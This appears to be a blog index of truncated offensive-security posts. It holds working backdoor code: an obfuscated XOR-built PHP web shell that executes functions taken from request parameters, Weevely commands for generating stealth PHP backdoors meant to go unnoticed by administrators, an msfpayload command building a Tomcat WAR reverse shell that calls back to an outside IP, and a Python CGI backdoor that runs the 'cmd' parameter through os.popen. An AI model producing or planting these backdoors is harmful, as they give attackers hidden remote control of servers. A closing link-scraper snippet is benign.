Non-alphanumeric PHP Simple Backdoor
After reading and learning about non-alphanumeric code in PHP, I decided to write my own non-alphanumeric PHP simple backdoor.

    <?
    $_="{"; #XOR char
    $_=($_^"<").($_^">").($_^"/"); #XOR = GET
    ?>
    <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

Well, it’s quite a simple program: it’s just an XOR over strings. By XOR-ing “<>/” with “{” we get the string “GET” as the result. Put the result in a one-liner code execution and done. Another version with a “<pre>” tag:

    <?
    $_="{"; #XOR...
Silent Backdoor with Weevely
Ever thought of gaining access to your backdoor undetected? Well, maybe not all web administrators examine their PHP files. Weevely is the answer. Just follow these steps (I was doing this on BackTrack 5, and take a look at the orange characters):

    root@bt:~# cd /pentest/backdoors/web/weevely
    root@bt:/pentest/backdoors/web/weevely# ./main.py -g -p bD_p4ss -o bd.php
    Weevely 0.3 – Generate and manage stealth PHP backdoors.
    Copyright (c) 2011-2012 Weevely Developers
    Website: http://code.google.com/p/weevely/
    + Backdoor file ‘bd.php’ created with password...
Create a WAR backdoor with Metasploit
Facing a Tomcat server and need to upload a WAR backdoor? Well, we can create a WAR backdoor very easily with Metasploit. OK, follow these steps:

1. Creating the backdoor.

    dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W > dudul.war
    Created by msfpayload (http://www.metasploit.com).
    Payload: linux/x86/shell_reverse_tcp
    Length: 71
    Options: {"LHOST"=>"172.16.96.1"}

It will create a WAR file containing a random name for the JSP backdoor file.

2. Upload the WAR file.

3. Use netcat to...
The dangerous effect of upload feature
Two days ago, I tried to do some research on web application security. My main focus was targeting the upload feature of a website. Many websites today use an upload feature to interact with their users, for example on a job search website or an educational website. From several trials that I’ve done with some websites, almost 30% of the websites used an unsanitized upload feature, and the rest mostly used a filtered upload feature. I will not go into the unsanitized upload feature; it will be covered automatically. OK, let's discuss using an upload feature arbitrarily. As I said...
CGI Backdoor for Linux with Python
    #!/usr/bin/env python
    # Info : Linux based CGI backdoor with python
    # author: otoy
    # date : 0x102010
    import cgi,os,re,sys
    form = cgi.FieldStorage()
    cmd = form.getvalue('cmd', '')
    osexe = os.popen(cmd)
    dirt = os.getcwd()+'/'
    prognm = sys.argv[0].strip()
    progfl = re.findall(dirt+'(.*)',prognm)[0]
    osinf = os.uname()
    info='''====================================
    CGI python backdoor
    ====================================
    Author : otoy
    Date : 0x102010
    Blog : <a href="http://otoyrood.wordpress.com"...
Web Links Gatherer (ver 2)
By using Beautiful Soup, we can change the code seen in the previous post to the code below, and it even works much better. Just by changing the regex function, it returns a better result:

    #!/usr/bin/python
    # otoy -- http://otoyrood.wordpress.com
    # 0x102010
    from urllib import urlopen
    from BeautifulSoup import BeautifulSoup
    text = urlopen('http://otoyrood.wordpress.com').read()
    soup = BeautifulSoup(text)
    pages = set()
    for header in soup('a'):
        pages.add(header['href'])
    print...